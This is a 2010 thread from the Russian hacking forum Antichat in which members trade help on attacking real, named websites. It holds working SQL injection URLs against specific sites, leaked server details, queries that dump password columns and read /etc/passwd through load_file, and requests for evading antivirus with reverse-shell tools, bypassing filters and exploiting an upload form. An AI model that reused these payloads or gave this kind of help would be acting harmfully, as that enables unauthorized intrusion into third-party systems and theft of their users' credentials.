ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12381  
Старый 05.04.2010, 19:02
Аватар для FAQ666
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
 
Ответить с цитированием

  #12382  
Старый 05.04.2010, 19:33
Аватар для budden
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Есть альтернативная версия netcat (просто заново скомпилированная - она не детектится). Еще есть mocat. Поищи в гугле.
 
Ответить с цитированием

  #12383  
Старый 05.04.2010, 19:50
Аватар для Darren
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

Помогите please докрутить скуль

http://www.nnovia.com/products.php?id=31%20and%201=2
 
Ответить с цитированием

  #12384  
Старый 05.04.2010, 20:56
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
 
Ответить с цитированием

  #12385  
Старый 05.04.2010, 21:24
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
а таблицы с юзверями там всеравно нет.....
 
Ответить с цитированием

  #12386  
Старый 05.04.2010, 21:26
Аватар для Darren
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

2 Pashkela thanks.

Я ввожу твою строку

http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

и на экране ничего не выводится. или эта конструкция работает только с тулзой?

Последний раз редактировалось Darren; 06.04.2010 в 00:00..
 
Ответить с цитированием

  #12387  
Старый 05.04.2010, 21:30
Аватар для Atra Pluvia
Atra Pluvia
Banned
Регистрация: 05.04.2010
Сообщений: 1
Провел на форуме:
17233

Репутация: 0
По умолчанию

Цитата:
Сообщение от Darren  
Pashkela thanks.

а от чего зависит
+and+substring(version(),1,1)=3
+and+substring(version(),1,1)=4
или?
+and+substring(version(),1,1)=5
От того, какая версия мускула стоит.
 
Ответить с цитированием

  #12388  
Старый 05.04.2010, 22:10
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

может кто поможет и подскажет как раскрутить....
получен доступ к password а к login нет
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encry pt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x7 1),2,3,4,5+from+users--
решил использовать load_file('/etc/passwd')
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632 f706173737764),2,3,4,5+from+users--
получил права на чтение файлов
/home/
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d6 52f),2,3,4,5+from+users--
а вот в дальнейших деррикториях я запутался
 
Ответить с цитированием

  #12389  
Старый 05.04.2010, 23:56
Аватар для ZeroCold
ZeroCold
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме:
34021

Репутация: 0
По умолчанию

Цитата:
Сообщение от ZeroCold  
Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
Код:
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет.
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
Код:
<input type="file" name="img_mini">
- об окне ввода пути откуда загружать
Код:
<input type="submit" value="Вставить файлы" id="files" name="files">
- собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
Вопрос все еще актуален, нужны свежие идеи ))
 
Ответить с цитированием

  #12390  
Старый 06.04.2010, 00:29
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ